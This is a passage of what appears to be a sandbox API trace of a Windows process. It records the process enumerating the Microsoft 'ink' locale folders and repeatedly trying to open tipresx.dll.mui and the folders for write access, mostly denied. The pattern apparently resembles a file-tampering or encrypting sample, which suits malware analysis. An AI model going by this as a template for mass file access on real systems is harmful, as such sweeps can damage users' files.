returned 0x6a3b0 [0082.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 57 [0082.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.088] GetLastError () returned 0x5 [0082.088] GetLastError () returned 0x5 [0082.088] SetLastError (dwErrCode=0x5) [0082.088] GetLastError () returned 0x5 [0082.088] SetLastError (dwErrCode=0x5) [0082.088] GetLastError () returned 0x5 [0082.088] SetLastError (dwErrCode=0x5) [0082.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0082.088] AreFileApisANSI () returned 1 [0082.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0082.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 57 [0082.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.088] GetLastError () returned 0x5 [0082.088] GetLastError () returned 0x5 [0082.088] SetLastError (dwErrCode=0x5) [0082.088] GetLastError () returned 0x5 [0082.088] SetLastError (dwErrCode=0x5) [0082.088] GetLastError () returned 0x5 [0082.089] SetLastError (dwErrCode=0x5) [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0082.089] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0082.089] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78510 [0082.089] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.089] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51398 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0082.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.090] AreFileApisANSI () returned 1 [0082.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.091] AreFileApisANSI () returned 1 [0082.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0082.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 73 [0082.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.301] GetFileType (hFile=0x428) returned 0x1 [0082.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0082.301] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.301] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.301] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.309] CloseHandle (hObject=0x428) returned 1 [0082.309] AreFileApisANSI () returned 1 [0082.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85da0 [0082.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 73 [0082.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.314] GetLastError () returned 0x5 [0082.314] GetLastError () returned 0x5 [0082.314] SetLastError (dwErrCode=0x5) [0082.314] GetLastError () returned 0x5 [0082.314] SetLastError (dwErrCode=0x5) [0082.314] GetLastError () returned 0x5 [0082.314] SetLastError (dwErrCode=0x5) [0082.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0082.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.314] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.314] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⠀")) returned 0 [0082.314] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0082.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0082.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0082.315] AreFileApisANSI () returned 1 [0082.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE", lpUsedDefaultChar=0x0) returned 57 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0082.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.316] AreFileApisANSI () returned 1 [0082.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 57 [0082.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.316] GetLastError () returned 0x5 [0082.316] GetLastError () returned 0x5 [0082.316] SetLastError (dwErrCode=0x5) [0082.316] GetLastError () returned 0x5 [0082.316] SetLastError (dwErrCode=0x5) [0082.316] GetLastError () returned 0x5 [0082.316] SetLastError (dwErrCode=0x5) [0082.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.316] AreFileApisANSI () returned 1 [0082.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0082.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE") returned 57 [0082.316] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.316] GetLastError () returned 0x5 [0082.316] GetLastError () returned 0x5 [0082.317] SetLastError (dwErrCode=0x5) [0082.317] GetLastError () returned 0x5 [0082.317] SetLastError (dwErrCode=0x5) [0082.317] GetLastError () returned 0x5 [0082.317] SetLastError (dwErrCode=0x5) [0082.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0082.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0082.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0082.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0082.317] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa055662c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0082.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0082.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0082.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0082.317] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x780d0 [0082.318] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.318] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0082.318] RtlAllocateHeap (HeapHandle=0x20000, 